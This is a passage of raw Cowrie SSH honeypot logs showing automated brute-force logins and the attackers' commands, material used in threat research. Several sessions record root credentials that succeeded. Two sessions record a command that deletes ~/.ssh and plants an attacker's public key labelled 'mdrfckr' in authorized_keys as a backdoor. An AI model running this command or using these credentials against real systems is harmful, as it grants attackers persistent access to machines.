512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:21.308424Z","src_ip":"103.217.145.104","session":"ead64ce4185b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:59:22.411434Z","src_ip":"103.217.145.104","session":"ead64ce4185b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:22.678352Z","src_ip":"103.217.145.104","session":"ead64ce4185b"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:22.679552Z","src_ip":"103.217.145.104","session":"9e02db8d2cb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32930,"dst_ip":"1.2.3.4","dst_port":22,"session":"bacb0f9e9178","protocol":"ssh","message":"New connection: 212.227.125.160:32930 (1.2.3.4:22) [session: bacb0f9e9178]","sensor":"my-vps","timestamp":"2025-08-26T03:59:45.759509Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:45.760723Z","src_ip":"212.227.125.160","session":"bacb0f9e9178"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":49294,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b55bfec4876","protocol":"ssh","message":"New connection: 68.183.87.241:49294 (1.2.3.4:22) [session: 7b55bfec4876]","sensor":"my-vps","timestamp":"2025-08-26T03:59:51.132391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:51.133207Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:51.404275Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa1234567.","message":"login attempt [root/Aa1234567.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:59:52.530044Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:59:53.131432Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:59:53.132230Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:59:53.133658Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:53.405778Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:59:54.003986Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.004777Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.278360Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.279388Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":34402,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e2c85ecdfd8","protocol":"ssh","message":"New connection: 68.183.87.241:34402 (1.2.3.4:22) [session: 9e2c85ecdfd8]","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.538798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.539511Z","src_ip":"68.183.87.241","session":"9e2c85ecdfd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:54.794942Z","src_ip":"68.183.87.241","session":"9e2c85ecdfd8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:59:55.872193Z","src_ip":"68.183.87.241","session":"9e2c85ecdfd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34740,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f9a4e74e8ea","protocol":"ssh","message":"New connection: 212.227.235.229:34740 (1.2.3.4:22) [session: 2f9a4e74e8ea]","sensor":"my-vps","timestamp":"2025-08-26T03:59:56.378030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:56.379090Z","src_ip":"212.227.235.229","session":"2f9a4e74e8ea"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:57.135801Z","src_ip":"68.183.87.241","session":"9e2c85ecdfd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:57.210789Z","src_ip":"212.227.235.229","session":"2f9a4e74e8ea"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":34418,"dst_ip":"1.2.3.4","dst_port":22,"session":"e791c44c6b52","protocol":"ssh","message":"New connection: 68.183.87.241:34418 (1.2.3.4:22) [session: e791c44c6b52]","sensor":"my-vps","timestamp":"2025-08-26T03:59:57.404065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:59:57.405662Z","src_ip":"68.183.87.241","session":"e791c44c6b52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:59:57.677010Z","src_ip":"68.183.87.241","session":"e791c44c6b52"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:59:58.798830Z","src_ip":"68.183.87.241","session":"e791c44c6b52"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:59.068379Z","src_ip":"68.183.87.241","session":"7b55bfec4876"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:59:59.069544Z","src_ip":"68.183.87.241","session":"e791c44c6b52"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":43482,"dst_ip":"1.2.3.4","dst_port":22,"session":"080b0989e638","protocol":"ssh","message":"New connection: 93.123.109.181:43482 (1.2.3.4:22) [session: 080b0989e638]","sensor":"my-vps","timestamp":"2025-08-26T04:00:02.051761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:00:02.059937Z","src_ip":"93.123.109.181","session":"080b0989e638"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:00:02.089010Z","src_ip":"93.123.109.181","session":"080b0989e638"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:00:02.212618Z","src_ip":"93.123.109.181","session":"080b0989e638"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:03.242135Z","src_ip":"93.123.109.181","session":"080b0989e638"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35034,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5bf8e51e67f","protocol":"ssh","message":"New connection: 212.227.235.229:35034 (1.2.3.4:22) [session: b5bf8e51e67f]","sensor":"my-vps","timestamp":"2025-08-26T04:00:33.408044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:00:33.409148Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:00:33.672974Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.login.success","username":"root","password":"Spring123","message":"login attempt [root/Spring123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:00:36.023068Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:00:36.562701Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:00:36.563383Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:00:36.564440Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:36.821815Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:00:37.970930Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:00:37.971592Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:00:38.232366Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:00:38.233526Z","src_ip":"212.227.235.229","session":"b5bf8e51e67f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43690,"dst_ip":"1.2.3.4","dst_port":22,"session":"689225265dba","protocol":"ssh","message":"New connection: 212.227.235.229:43690 (1.2.3.4:22) [session: 689225265dba]","sensor":"my-vps","timestamp":"2025-08-26T04:00:38.480982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:00:38.481823Z","src_ip":"212.227.235.229","session":"689225265dba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:00:38.729771Z","src_ip":"212.227.235.229","session":"689225265dba"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:00:40.872694Z","src_ip":"212.227.235.229","session":"689225265dba"}
